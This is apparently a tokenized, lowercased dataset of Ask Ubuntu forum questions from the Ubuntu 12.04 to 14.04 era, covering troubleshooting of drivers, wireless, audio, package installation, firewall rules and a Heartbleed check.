450033	how to transfer all settings to a new installation ?	i want my install my ubuntu installation in a dedicated hard drive instead of a partition . i am thinking about doing a fresh 14.04 install on this empty hard drive . how can i transfer my settings so , i do n't have to reinstall everything and setup everything again ?
450036	constant popping/cracking sound	so after fresh installing 14.04 i get this nearly constant pooping or cracking sound coming from my laptop speakers . i tried removing pulse audio but it does not help . this sound is also in live ubuntu usb . also this sound appears even when ubuntu is not even fully started and still loading ( i did n't login ) . i had this sound in 13.10 , but somehow i made it go away , but i tried literally every single solution posted i could find , but i am not sure what helped . also reducing audio does not prevent cracking sound , but muting does . when using any headphones this sound goes away . edit : now for example whole day yesterday it was ok , but today sound again started , even though i did n't even restart my computer .
450037	ubuntu 14.04 on mid-2009 macbook pro not booting	i have a 15-inch 2.53ghz mid-2009 macbook pro ( in some places known as `` macbookpro 5.4 '' ) . i wanted to dual boot mac os x with ubuntu 14.04 desktop 64-bit , so i set up a secondary partition using disk utility ( not bootcamp assistant as it wants a windows 7 disk ) . i rebooted , booted from the ubuntu dvd i burned ( there are two options in the boot menu , the efi version called `` efi boot '' and the bios version misleadingly called `` windows , '' i chose the efi one ) , and first thing i do is check disk for defects , and there are n't any . so i reboot and start up the installer , but the ubuntu splash screen comes up garbled and it stays there forever . ( i 've waited 2 hours , i do n't think the live cd is supposed to take that long to start ) . so i noticed there was something wrong . one potential solution i found was installing refit on the mac os x partition . so i did . i started up the efi boot loader from the ubuntu disk using refit instead of holding down option on startup ( needed to refresh a couple times for refit to see the dvd ) , same result . another solution was booting with nomodeset . this time it did n't get stuck at the splash screen , but a completely black screen ( no blinking cursor either ) after being at the boot screen for a while . it could be a video driver problem , but how , if i 've booted with nomodeset ? i 've also tried the `` 64-bit mac '' version that they offer on the download page . that version does n't have an efi version , only bios , but it boots exactly the same way ( either stuck on the boot screen or a black screen ) . i do n't want to try the 32-bit version as it could be much slower and also wo n't recognize my full 8gb of ram . ( edit : tried it , still boots to a black screen ) 4/23 update : after commenting the answers i got , i should mention that on my macbook pro i have downgraded the efi firmware from 1.7 to 1.6 because i replaced the hard drive myself ( the original one died ) , and the 1.7 update makes hard drives you replaced yourself become so slow they 're unusable because they 're `` unsupported '' . for this reason i also ca n't install anything newer than mac os x mountain lion 10.8.3 on my mac , even if it would work normally ( it would throw looping errors similar to the ones i mentioned in a comment ) , in fact i 'm stuck on lion 10.7.5 . the solution i found on the internet about this only works for seagate hard drives , and i have a western digital . if i upgrade the efi firmware again , i could finally install ubuntu , but it would be slowed down to a crawl ( random hangs every 10 seconds or so ) , so it 's not worth it . i 'd rather just buy a new $ 300 non-apple laptop and put ubuntu there . thanks everyone who answered , but i 'm open to trying something else to get it to work , if anyone has a potential solution .
450040	ubuntu 14.04 vlc has no interface	i am on a fresh install of ubuntu tt 14.04 , i installed the vlc-player . ( tried via software center and console ) the problem is that when i try to run vlc the icon will appear in tray and dash , but no window opens up . console says : max @ schleptop : ~ $ vlc vlc media player 2.1.5 rincewind ( revision2.1.2+git20140414+r54518+18+11~ubuntu14.04.1 ) [ 0x1fbd058 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . what am i doing wrong ? how do i get to see the interface ? gz
450041	ca n't use require all without order deny , allow	so i upgraded my ubuntu server 12.04 lts to the 14.04 version . i know that now we have to use : require all denied instead order deny , allow deny from all however the new syntax does n't work if i do n't write the order deny , allow . can anyone help me to understand what 's wrong ?
450042	ca n't see my 2nd hard disk ubuntu 12.04	would you please help - i 've installed ubuntu onto windows ( i have the two systems at the same time ) and i ca n't see my 2nd hard disk . i could see it when i ran ubuntu from a usb stick and i can see it in windows but not in ubuntu . can you please help ? please note i am not a pc expert and i would be glad for a very simple answer ... thank you in advance !
450045	get cpu usage in command	i want get cpu usage . i used this command : top -bn1 | grep `` cpu ( s ) '' | sed `` s/ . * , *\ ( [ 0-9 . ] *\ ) % * id . */\1/ '' | awk ' { print 100 - $ 1 } ' but return 100 % . i dont know what to do .
450046	black screen with nvidia drivers on ubuntu	i have : asus p4v800d-x intel pentium 4 ht 2.80ghz 2.5gb ram 40gb hdd nvidia 9500gt when i installed nvidia drivers downloaded from nvidia.com website ( selected recommended drivers ) , i simply ca n't boot into desktop . i pass through purple screen , and then i get black screen with flashing white underscore on left hand side . keyboard shortcuts are not working and the only way to get to desktop mode is booting into recovery mode ( holding shift when booting etc. ) . in recovery mode i run : sudo apt-get remove -- purge nvidia* and that is the only way to get a `` normal '' desktop environment . i put a quotes on a normal because computer is running slow and i ca n't set proper resolution . also , i 've tried to install drivers via ubuntu gui interface ( proprietary , tested drivers ) , but with no luck . i am using ubuntu 14.04
450048	can not connect to wireless in lubuntu 14.04	i have tried all afternoon to fix this , but now i give up . i am trying to set up an old xp pc with lubuntu 14.04 . it works perfectly fine , except for the wireless connection . connecting with ethernet works fine . i have a d-link dwl-g122 , trying to connect to a fritz ! box 7170 with wpa ( tkip ) - i switched from wpa + wpa2 , but no effect . i have tried with wicd , where it hangs at trying to optain an ip address from the dhcp server . i tried a static ip , it did connect to the wifi , but i had no internet connection then . also , i did n't like the hack , since it 's my parents pc , where i 'd like to have everything set up properly for when i am not around . i removed wicd , and with the network-manager service stopped , i tried it with terminal and sudo dhclient -v wlan0 but i still could not get an ip address . i tried with the network-manager ( removed and reinstalled ) , but i just ca n't get it to connect . when i click the icon in the tray , the connection properties pop up and in the connection is only listed lo and eth0 . my /etc/network/interfaces looks like this : interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto wlan0 iface wlan0 inet dhcp # auto eth0 # iface eth0 inet dhcp # auto ath0 # iface ath0 inet dhcp if you need any output of anything , i will do that . how do i make the connection ? the outcome of the wireless_script ( as suggested ) can be found here http : //pastebin.ubuntu.com/7281731/ the lines ieee80211 phy0 : rt2x00lib_autowakeup : error - device failed to wakeup ieee80211 phy0 : rt2500usb_set_device_state : error - device failed to enter state 3 ( -16 ) can be found repeating . so i googled the first one and found that proposal : sudo /etc/init.d/network-manager stop sudo iwconfig wlan0 power off sudo service network-manager restart and it works , right after the second line . i do have to click the tray icon and select wlan0 , but then it works . however i have to do that every time after i login . and it takes now 2 minutes more to boot , because lubuntu tries to configure the network .
450049	extremely slow connection with a broadcom bcm4313 wireless card	recently upgraded into 14.04 from 12.04 using ubuntu update manager . after the system restart , the browser is not showing the web pages ( although the wireless network is present/connected and running ) . i would say the internet is extremely extremely extremely slow , because few bookmarked sites showed some bits of site contents 1/1000 times . and the the loading circle symbol turns to orange most of the time , anyhow displays nothing . wireless driver ( proprietary ) : broadcom bcm4313 wireless driver lenovo g580 laptop intel i5 i am not in a situation to connect my lap using the network cable . so looking forward to alternate solutions here is the link to the current wireless status/information of my system . here is the link to the nethogs results and the browser loading window ( which shows the page title and loading symbol turns orange ) . my internet connection peeks 580kb/s in windows and 12.04 any help is much appreciated update : connected to the network using usb tethering from my phone , and works like a charm . which means wired connection is still on . done some 20kb of update and still the wifi stays the same . it feels so great ( relieved ) posting here from my 14.04 . the pain is still there , but i will live . the final update a special thanks to @ wild man for solving this nightmare of mine . and to you guys who took the effort to give a helping hand . you guys are the best
450051	ubuntu freezes when trying to mount my windows phone	when i connect my windows phone through usb and open the shortcut on the ubuntu launcher , ubuntu completely freezes . is there a way to fix that ?
450053	when is ubuntu for android getting released ?	i wanted to find a cheap alternative to a new pc and i read about ubuntu for android . i see no links or whatsoever to install it so i guessed that it was not available yet . i would like to know if it is actually available to be installed or when it will be . thanks
450059	ubuntu 14.04 default firewall rules	i would like to know exactly which scripts are responsible for default iptables rules ( no ufw , no gufw ) in ubuntu server 14.04 . after fresh installation even with ufw disabled ( by default ) there are such rules : root @ hv0 : ~ # iptables -l -n chain input ( policy accept ) target prot opt source destination accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53 accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:67 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:67 chain forward ( policy accept ) target prot opt source destination accept all -- 0.0.0.0/0 192.168.122.0/24 ctstate related , established accept all -- 192.168.122.0/24 0.0.0.0/0 accept all -- 0.0.0.0/0 0.0.0.0/0 reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain output ( policy accept ) target prot opt source destination accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:68 after installation on iptables-persistent and flushing all iptables rules and saved configuration once again those rules are back . how can i get rid of them ? regards mikolaj
450062	no navigation under keyboard shortcuts in ubuntu 14.04	in ubuntu 14.04 under gnome flashback i do n't see the former navigation menu under keyboard under settings . i want to define shifts between workspaces ( not cntrl+alt+cursor but only cntrl+cursor ) , the 12 function keys to open my 12 workspaces , and to shift open windows between workspaces with cntrl+alt+cursor . how do i do such now ?
450065	can not get past log in screen	i 've tried guest session and my regular login , neither work . it accepts the password then leaves me with just the login screen 's wallpaper .
450066	rotate touchscreen and disable the touchpad on yoga 2 pro in rotated mode	on my lenovo yoga 2 pro i installed ubuntu 14.04 32bit and kept the installed windows 8 on another partition . in windows , when you turn it into tablet mode , the keyboard and touchpad turns off so you do n't accidently click on it at the back of the `` tablet '' . in ubuntu 14.04 only the keyboard turns off , but the touchpad stays active . not even the fn+f6 combination does n't turn it off . so far i can only disable it with synclient touchpadoff=1 ( and re-enable with 0 ) i tried xev to get the keycode for fn+f6 but pressing this combo generates no output . turning the monitor to the back neither . how can i disable the touchpad automatically when i rotate or turn the monitor on the back , and re-enable the fn+f6 hotkey ? screenshot of the touchpad off button on f6 update : after some weeks sudo apt-get upgrade fn+f6 is working now , so there is only the question how to rotate the screen and how to disable the touchpad automatically when rotating the screen .
450067	switching off images in firefox	in older versions of firefox there was an option to switch off loading of graphics . now , in 28.0 i can no longer find it . it uses to be in [ edit ] - > [ preferences ] - > ... is there a simple way to avoid loading graphics in current versions of firefox ?
450069	ubuntu 12.04 usb issue	i recently rolled out a dell latitude d620 with xubuntu 12.04 installed . the user in question has an hp deskjet 2512 printer/scanner and a nikon coolpix l22 , both of which were detected and worked fine when the system was given to the user , about a month ago . today she calls and says she can not scan . a check with lsusb shows the hp device is there . the hplip system was already installed on the machine , but with this weirdness.. the hp device is not seen by hplip , nor can it be detected by hplip , even with the `` manual configuration '' where you enter the xxxx : xxxx device id from lsusb . i figured something was off with hplip , but when the user asked me to download new pix from her nikon camera , i found that it , too , was seen in lsusb , but f-spot does not see it . since the machine was set for automatic updates , it appears that one or more updates has partially broken usb , at least for imaging devices . is there any way to see what updates have been applied , and more importantly , to roll back any that bork usb ? i 've used linux/ubuntu for a long time , but have never run into an issue like this ... edit : its unknown if the printer functionality on the hp aio works as the user does not have any print cartridges for it , and does not intend to use the printer function..
450070	assigning print button to screenshot not working after upgrade from 13.10 to 14.04	when i pressed the print button , nothing happened . checked in system settings , the button is assigned to screenshot . if i assign any other button except print , it works normally . is this a known bug ? hp pavilion dv6-6051er edit . exactly as this bug but i 'm using unity not kde : https : //bugs.launchpad.net/ubuntu/+source/kde-workspace/+bug/1243733 apparently , no keyboard shortcuts work when assigned to the print button . the button itself is working , as i can assign by pressing it .
450072	ca n't log into ubuntu after rsync restore of home folder	i have recently reinstalled ubuntu/lubuntu 14.04 onto my wife 's packard bell dot s netbook after an unsuccessful upgrade from 12.04 . i followed this by restoring the home directory from a backup using rsync . i used the -- archive option which is supposed to keep permissions and ownership information . i can log onto my account but not hers . when i log on it immediately goes back to the login screen . i tried to change the ownership of all my wife 's files in her home directory from my account but even this did not help . why does this occur and how can i get to log into her profile . i must add that the install was successful as i could log into her account prior to the restore using rsync . i followed the exact same process for the install and restore on another computer and there is no problem .
450073	adaptador de red usb tl wn 8200 nd v1	hola les escribo desde argentina yo he tenido este inconveniente tambien con el adaptador tl-wn8200nd_v1 en ubuntu 12.04 y no encuentro la manera de instalar los drivers para que me funcione . cuando lo conecto me reconoce el dispositivo pero no me puedo conectar a las redes me pide las contrase単as del wifi y nunca se conecta que puedo hacer ? ? edited google-translate -- - > hi i write from argentina . i 've had this problem also with the tl-wn8200nd_v1 adapter in ubuntu 12.04 and i can not find how to install drivers to make it work . the device is recognized when i connect it , but i can not connect to networks . it 's asking me the wifi password and never connects that i can do ?
450074	do apps instaled via dpkg get updated ?	i downloaded application which i did not add repository for ( chrome or maxthon ) and installed it via software center / dpkg ( without adding the repo ) . do those apps get updated automatically ?
450075	how can i show all non-minimized windows ?	i am running ubuntu desktop 14.04 with unity . it has some great keyboard combos for navigating about my various windows . super + w shows all open windows . alt + tab lets me scroll through applications . alt + ` lets me scroll through just the windows for a given application . it 's a great tool set when you have too many windows and not enough screen real estate . however , what i 'd really like is something like super + w that excludes minimized windows . do n't get me wrong , seeing the minimized windows is great sometimes , but sometimes they create screen clutter . i have some applications that i 'd really like to just minimize to the tray ( i know that 's a windows concept that i 'm not sure translates entirely to ubuntu , but bear with me ) because i 'm not actively using them . i only have them running to get notifications ( geary email client , skype , etc . ) , but they do n't support sending to the tray , so i have them minimized . that 's more or less okay , but then i have 4 extra windows cluttering my screen when i super + w. anyone know a way to exclude these from super + w ? or make applications go to the tray and keep running when you close their window ?
450076	openssl remains vulnerable after update to 14.04	we have an aws server running openvpn which was built using ubuntu 13.10 . after the announcement of the heartbleed vulnerability , we updated the server . this morning , we upgraded the server to 14.04 . the current output of `` openssl version -a '' is : openssl 1.0.1f 6 jan 2014 built on : mon apr 7 21:22:23 utc 2014 platform : debian-amd64 options : bn ( 64,64 ) rc4 ( 16x , int ) des ( idx , cisc,16 , int ) blowfish ( idx ) compiler : cc -fpic -dopenssl_pic -dopenssl_threads -d_reentrant -ddso_dlfcn -dhave_dlfcn_h -m64 -dl_endian -dtermio -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security -d_fortify_source=2 -wl , -bsymbolic-functions -wl , -z , relro -wa , -- noexecstack -wall -dmd32_reg_t=int -dopenssl_ia32_sse2 -dopenssl_bn_asm_mont -dopenssl_bn_asm_mont5 -dopenssl_bn_asm_gf2m -dsha1_asm -dsha256_asm -dsha512_asm -dmd5_asm -daes_asm -dvpaes_asm -dbsaes_asm -dwhirlpool_asm -dghash_asm openssldir : `` /usr/lib/ssl '' i verified the fact that the server is still vulnerable using the following : : ~ $ openssl s_client -connect openvpn.example.com:443 -tlsextdebug 2 > & 1| grep 'server extension `` heartbeat '' ( id=15 ) ' || echo safe tls server extension `` heartbeat '' ( id=15 ) , len=1 attempts to run `` sudo apt-get install openssl '' return that the current version is already installed . what are the best options to resolve this issue ? does it appear there was a problem during distribution upgrade ; i.e . is the 14.04 openssl package actually outside the danger range ? or is there a possible issue with the repository itself ?
450077	screen truns off when i lock , but does n't lock . `` lock '' settings grayed out	i 'm on trusty and i ca n't lock my computer by any means . when i press super+l or use the lock button in the panel , the behavior is the same : the screen turns black and if i move the mouse , my desktop pops up again , without ever locking . i 'm on trusty x86 and i confirmed that if i create a new user account , i can lock the screen in that account . i checked the lock settings in `` brightness & lock '' and everything is grayed out , as the following screen capture shows . how can i enable the usual system lock again ?
450081	update manager , software center , synaptic package manager segfault	i made and ran a shell script made up of the following : wget -q `` http : //deb.playonlinux.com/public.gpg '' -o- | sudo apt-key add - sudo wget http : //deb.playonlinux.com/playonlinux_precise.list -o /etc/apt /sources.list.d/playonlinux.list sudo apt-get update sudo apt-get install playonlinux however , the installation failed . since then i cant run any of update manager , software center , synaptic package manager , they all segfault . none of the apt-get commands return any error messages nor do anything else . should i try and delete : /etc/apt/sources.list.d/playonlinux.list directory ? it still has playonlinux.list.save , playonlinux.list files in it . something must be corrupted , just dont know what since i get no specific error messages via bash . would appreciate any help , really do n't want to reinstall . okay so after : sudo apt-get upgrade -o apt : :cache-start=100000000 i can run software-center again it does n't crash laarson @ laarson-ep31-ds3l : ~ $ sudo apt-get upgrade -o apt : :cache-start=100000000 reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : gimp-gmic whoopsie 2 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 1,893 kb of archives . after this operation , 6,144 b of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu/ precise/main gimp-gmic i386 1:1.5.8.6.1-0precise0~ppa [ 1,867 kb ] get:2 http : //archive.ubuntu.com/ubuntu/ precise-updates/main whoopsie i386 0.1.34 [ 26.2 kb ] fetched 1,893 kb in 2s ( 712 kb/s ) ( reading database ... 633686 files and directories currently installed . ) preparing to replace whoopsie 0.1.33 ( using ... /whoopsie_0.1.34_i386.deb ) ... whoopsie stop/waiting unpacking replacement whoopsie ... preparing to replace gimp-gmic 1:1.5.8.6-0precise0~ppa ( using ... /gimp-gmic_1 % 3a1.5.8.6.1-0precise0~ppa_i386.deb ) ... unpacking replacement gimp-gmic ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up whoopsie ( 0.1.34 ) ... whoopsie start/running , process 4358 setting up gimp-gmic ( 1:1.5.8.6.1-0precise0~ppa ) ... update-manager does run aswell i still get some weirdness as update-manager did crash again . the update manager does crash when trying to get info from network . so when ever i run update or upgrade in bash with -o apt : :cache-start=100000000 it seems it makes segfault gone . without it sudo apt-get update does give the errors again . what is going on ? http : //ubuntuforums.org/showthread.php ? t=2209984
450086	`` ca n't access trash '' in 12.04.4 lts	when i try to put something in the trash , i get message `` ca n't access trash '' . what do i need to do ? distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise ken @ ubuntu : ~ $ uname -a linux ubuntu 3.11.0-19-generic # 33~precise1-ubuntu smp wed mar 12 21:17:09 utc 2014 i686 i686 i386 gnu/linux
450087	how to bind f-keys to shortcuts in 14.04	after upgrading from 13.10 to 14.04 keyboard shortcuts using f-keys no longer function to activate keyboard functions . for example , f16 binded to home folder no longer works . nor does alt-f16 [ 1 ] : http : //s18.postimg.org/6x1ei2ys9/1fkey.png keyboards however when when alt-f is binded to home folder keyboard shortcut works fine . this is a new issue as i have had keys binded on many older versions of ubuntu without issues . please let me know how to fix
450088	steps to install smart card 2000 or pc/sc ft scr 2000	**hello dear friends can you help me to make the installation of `` smart card 2000 or pc/sc ft scr 2000 '' ... on ubuntu 12.04 lts ? i tried a few things like this link http : //doc.ubuntu-fr.org/smartcards but something is wrong ... best regards j.antonio**
450090	upgrade from ubuntu gnome 13.10 to ubuntu 14.04	i 'm currently running ubuntu gnome 13.10 but i 'd like to upgrade to ubuntu 14.04 with unity instead of gnome shell . how can i go about this ?
450093	firefox : change default application	me default djvu viewer is okular : xdg-mime : $ xdg-mime query default image/vnd.djvu okular.desktop in $ home/.local/share/applications/mimeapps.list : [ added associations ] image/vnd.djvu=okular.desktop ; evince.desktop ; when i click on a djvu -- okular opens it . in /etc/gnome/defaults.list ( /usr/share/applications/defaults.list links to this file ) : image/vnd.djvu=okular.desktop however firefox thinks my default app for djvus is evince : how do i set okular as a default viewer in firefox ? [ this does n't mean i want `` use okular '' to be a default action -- i just want it to be a default viewer ]
450094	corrputed my intel video drivers 12.04	i have a lenovo w520 with nvidia optimus and an intel sandybridge mobile gt2+ ( according to x log ) on 12.04 and after installing bumblebee it was all working fine ( apart from the nvidia card appearing to be a bit slower than the intel one ) . then i tried to get it working with multiple monitors , which was a huge mistake . i tried a few howtos , taking care to back them out when they failed . however i tried this one : http : //sagark.org/optimal-ubuntu-graphics-setup-for-thinkpads/ which involves patching the intel driver , and it worked a bit but not well enough . so i tried backing it out and now nothing opengl related works under the intel card . glxgears hangs x with the 'i915 stuck on render ring ' message . opengl stuff works fine using primus . most people with intel freeze issues seem to experience periodic freezes - my system works fine indefinitely as long as i do n't run anything using opengl . i 've tried reinstalling the intel driver package , mesa utils , and everything i can find to relate to the driver and opengl , but nothing makes a difference . the unity-test thing reports 3d is supported so unity 3d will attempt to start , then hang on login . seems like simply reinstalling the driver should have put it back to its original working condition ... ?
450097	problem with optirun bumblebee	i 'm trying to run optirun on my lenovo g580 with nvidia geforce 610m on ubuntu 14.04 . getting the following error $ optirun glxgears [ 98.457967 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) intel ( 0 ) : [ drm ] failed to set drm interface version : permission denied [ 13 ] . [ 98.458061 ] [ error ] aborting because fallback start is disabled . my .conf file : http : //paste.ubuntu.com/7278805/ please help asap , thanks edit : i also tried to run nvidia-settings to enable the nvidia gpu , but it does not work and gives a blank error/dialog box :
450101	ca n't install skype in 14.04 64-bit ( solved )	i have a problem with installing skype in my fresh new ubuntu 14.04 64-bit , using ubuntu software center solution : in software & updates set download from : main server download skype and install it through the terminal dpkg : dependency problems prevent configuration of skype : skype depends on libqtgui4 ( > = 4:4.8.0 ) . skype depends on libqtwebkit4 ( > = 2.2~2011week36 ) . install through the terminal sudo dpkg -- add-architecture i386 sudo sh -c `` echo 'deb http : //archive.canonical.com/ trusty partner ' > > /etc/apt/sources.list.d/canonical_partner.list '' sudo apt-get update sudo apt-get install skype the following packages have unmet dependencies : skype : depends : skype-bin result from apt-cache policy skype : skype : installed : 4.2.0.11-0ubuntu0.12.04.2 candidate : 4.2.0.11-0ubuntu0.12.04.2 version table : *** 4.2.0.11-0ubuntu0.12.04.2 0 500 http : //archive.canonical.com/ubuntu/ trusty/partner amd64 packages 500 http : //archive.canonical.com/ trusty/partner amd64 packages 100 /var/lib/dpkg/status result from sudo apt-get check : reading package lists ... done building dependency tree reading state information ... done result from apt-cache policy 'skype* : * ' : skype : installed : ( none ) candidate : 4.2.0.11-0ubuntu0.12.04.2 version table : 4.2.0.11-0ubuntu0.12.04.2 0 500 http : //archive.canonical.com/ubuntu/ trusty/partner amd64 packages 500 http : //archive.canonical.com/ trusty/partner amd64 packages skype4pidgin : installed : ( none ) candidate : ( none ) version table : skype-mid : installed : ( none ) candidate : ( none ) version table : pidgin-skype-dbg : installed : ( none ) candidate : 20130613+svn660+dfsg-1 version table : 20130613+svn660+dfsg-1 0 500 http : //bg.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages skype-bin : installed : ( none ) candidate : ( none ) version table : skype-common : installed : ( none ) candidate : ( none ) version table : result from cat /var/lib/dpkg/arch : amd64 i386 result from sudo apt-get update ign http : //archive.canonical.com trusty inrelease ign http : //extras.ubuntu.com trusty inrelease ign http : //ppa.launchpad.net trusty inrelease ign http : //archive.canonical.com trusty inrelease hit http : //extras.ubuntu.com trusty release.gpg hit http : //ppa.launchpad.net trusty release.gpg hit http : //archive.canonical.com trusty release.gpg hit http : //extras.ubuntu.com trusty release hit http : //ppa.launchpad.net trusty release hit http : //archive.canonical.com trusty release.gpg hit http : //archive.canonical.com trusty release hit http : //extras.ubuntu.com trusty/main sources hit http : //ppa.launchpad.net trusty/main sources hit http : //archive.canonical.com trusty release hit http : //extras.ubuntu.com trusty/main amd64 packages hit http : //ppa.launchpad.net trusty/main amd64 packages ign http : //archive.ubuntu.com trusty inrelease hit http : //archive.canonical.com trusty/partner sources hit http : //extras.ubuntu.com trusty/main i386 packages hit http : //ppa.launchpad.net trusty/main i386 packages hit http : //archive.canonical.com trusty/partner amd64 packages hit http : //archive.canonical.com trusty/partner i386 packages ign http : //archive.ubuntu.com trusty-updates inrelease hit http : //archive.canonical.com trusty/partner amd64 packages hit http : //archive.canonical.com trusty/partner i386 packages ign http : //archive.ubuntu.com trusty-backports inrelease ign http : //extras.ubuntu.com trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //archive.ubuntu.com trusty-security inrelease ign http : //extras.ubuntu.com trusty/main translation-en ign http : //ppa.launchpad.net trusty/main translation-en hit http : //archive.ubuntu.com trusty release.gpg get:1 http : //archive.ubuntu.com trusty-updates release.gpg [ 933 b ] hit http : //archive.ubuntu.com trusty-backports release.gpg ign http : //archive.canonical.com trusty/partner translation-en_us ign http : //archive.canonical.com trusty/partner translation-en hit http : //archive.ubuntu.com trusty-security release.gpg ign http : //archive.canonical.com trusty/partner translation-en_us ign http : //archive.canonical.com trusty/partner translation-en hit http : //archive.ubuntu.com trusty release get:2 http : //archive.ubuntu.com trusty-updates release [ 58.5 kb ] hit http : //archive.ubuntu.com trusty-backports release hit http : //archive.ubuntu.com trusty-security release hit http : //archive.ubuntu.com trusty/main sources hit http : //archive.ubuntu.com trusty/restricted sources hit http : //archive.ubuntu.com trusty/universe sources hit http : //archive.ubuntu.com trusty/multiverse sources hit http : //archive.ubuntu.com trusty/main amd64 packages hit http : //archive.ubuntu.com trusty/restricted amd64 packages hit http : //archive.ubuntu.com trusty/universe amd64 packages hit http : //archive.ubuntu.com trusty/multiverse amd64 packages hit http : //archive.ubuntu.com trusty/main i386 packages hit http : //archive.ubuntu.com trusty/restricted i386 packages hit http : //archive.ubuntu.com trusty/universe i386 packages hit http : //archive.ubuntu.com trusty/multiverse i386 packages hit http : //archive.ubuntu.com trusty/main translation-en hit http : //archive.ubuntu.com trusty/multiverse translation-en hit http : //archive.ubuntu.com trusty/restricted translation-en hit http : //archive.ubuntu.com trusty/universe translation-en get:3 http : //archive.ubuntu.com trusty-updates/main sources [ 1,712 b ] get:4 http : //archive.ubuntu.com trusty-updates/restricted sources [ 14 b ] get:5 http : //archive.ubuntu.com trusty-updates/universe sources [ 648 b ] get:6 http : //archive.ubuntu.com trusty-updates/multiverse sources [ 1,790 b ] get:7 http : //archive.ubuntu.com trusty-updates/main amd64 packages [ 2,966 b ] get:8 http : //archive.ubuntu.com trusty-updates/restricted amd64 packages [ 14 b ] get:9 http : //archive.ubuntu.com trusty-updates/universe amd64 packages [ 1,602 b ] get:10 http : //archive.ubuntu.com trusty-updates/multiverse amd64 packages [ 6,362 b ] get:11 http : //archive.ubuntu.com trusty-updates/main i386 packages [ 2,998 b ] get:12 http : //archive.ubuntu.com trusty-updates/restricted i386 packages [ 14 b ] get:13 http : //archive.ubuntu.com trusty-updates/universe i386 packages [ 1,601 b ] get:14 http : //archive.ubuntu.com trusty-updates/multiverse i386 packages [ 6,386 b ] hit http : //archive.ubuntu.com trusty-updates/main translation-en hit http : //archive.ubuntu.com trusty-updates/multiverse translation-en hit http : //archive.ubuntu.com trusty-updates/restricted translation-en hit http : //archive.ubuntu.com trusty-updates/universe translation-en hit http : //archive.ubuntu.com trusty-backports/main sources hit http : //archive.ubuntu.com trusty-backports/restricted sources hit http : //archive.ubuntu.com trusty-backports/universe sources hit http : //archive.ubuntu.com trusty-backports/multiverse sources hit http : //archive.ubuntu.com trusty-backports/main amd64 packages hit http : //archive.ubuntu.com trusty-backports/restricted amd64 packages hit http : //archive.ubuntu.com trusty-backports/universe amd64 packages hit http : //archive.ubuntu.com trusty-backports/multiverse amd64 packages hit http : //archive.ubuntu.com trusty-backports/main i386 packages hit http : //archive.ubuntu.com trusty-backports/restricted i386 packages hit http : //archive.ubuntu.com trusty-backports/universe i386 packages hit http : //archive.ubuntu.com trusty-backports/multiverse i386 packages hit http : //archive.ubuntu.com trusty-backports/main translation-en hit http : //archive.ubuntu.com trusty-backports/multiverse translation-en hit http : //archive.ubuntu.com trusty-backports/restricted translation-en hit http : //archive.ubuntu.com trusty-backports/universe translation-en hit http : //archive.ubuntu.com trusty-security/main sources hit http : //archive.ubuntu.com trusty-security/restricted sources hit http : //archive.ubuntu.com trusty-security/universe sources hit http : //archive.ubuntu.com trusty-security/multiverse sources hit http : //archive.ubuntu.com trusty-security/main amd64 packages hit http : //archive.ubuntu.com trusty-security/restricted amd64 packages hit http : //archive.ubuntu.com trusty-security/universe amd64 packages hit http : //archive.ubuntu.com trusty-security/multiverse amd64 packages hit http : //archive.ubuntu.com trusty-security/main i386 packages hit http : //archive.ubuntu.com trusty-security/restricted i386 packages hit http : //archive.ubuntu.com trusty-security/universe i386 packages hit http : //archive.ubuntu.com trusty-security/multiverse i386 packages hit http : //archive.ubuntu.com trusty-security/main translation-en hit http : //archive.ubuntu.com trusty-security/multiverse translation-en hit http : //archive.ubuntu.com trusty-security/restricted translation-en hit http : //archive.ubuntu.com trusty-security/universe translation-en ign http : //archive.ubuntu.com trusty/main translation-en_us ign http : //archive.ubuntu.com trusty/multiverse translation-en_us ign http : //archive.ubuntu.com trusty/restricted translation-en_us ign http : //archive.ubuntu.com trusty/universe translation-en_us ign http : //archive.ubuntu.com trusty-updates/main translation-en_us ign http : //archive.ubuntu.com trusty-updates/multiverse translation-en_us ign http : //archive.ubuntu.com trusty-updates/restricted translation-en_us ign http : //archive.ubuntu.com trusty-updates/universe translation-en_us ign http : //archive.ubuntu.com trusty-backports/main translation-en_us ign http : //archive.ubuntu.com trusty-backports/multiverse translation-en_us ign http : //archive.ubuntu.com trusty-backports/restricted translation-en_us ign http : //archive.ubuntu.com trusty-backports/universe translation-en_us ign http : //archive.ubuntu.com trusty-security/main translation-en_us ign http : //archive.ubuntu.com trusty-security/multiverse translation-en_us ign http : //archive.ubuntu.com trusty-security/restricted translation-en_us ign http : //archive.ubuntu.com trusty-security/universe translation-en_us
450102	pulseaudio randomly mute itself without a reason	i recently installed fresh ubuntu 14.04 . i 've got external audio card audiotrak maya u5 . it always worked fine until new ubuntu . music randomly get muted and there 's no visible changes in sound settings or anything . i mean , it even does n't look like it 's muted , the sound just does n't work . what i have to do then is to close the music player , wait a minute and run it again to get my sound back . what could be the problem ? thx a lot ! ps sry for my poor english .
450103	how to write a shell script which gets notified when an avi file is played from terminal ?	for my project purpose i want to write a shell script program which runs in the background and acts as a listener to a specified avi file . when that avi file is played from terminal my script file should get notified and executes certain commands before that avi file is played . can i achieve this with the help of trap command or some other trick could be used .
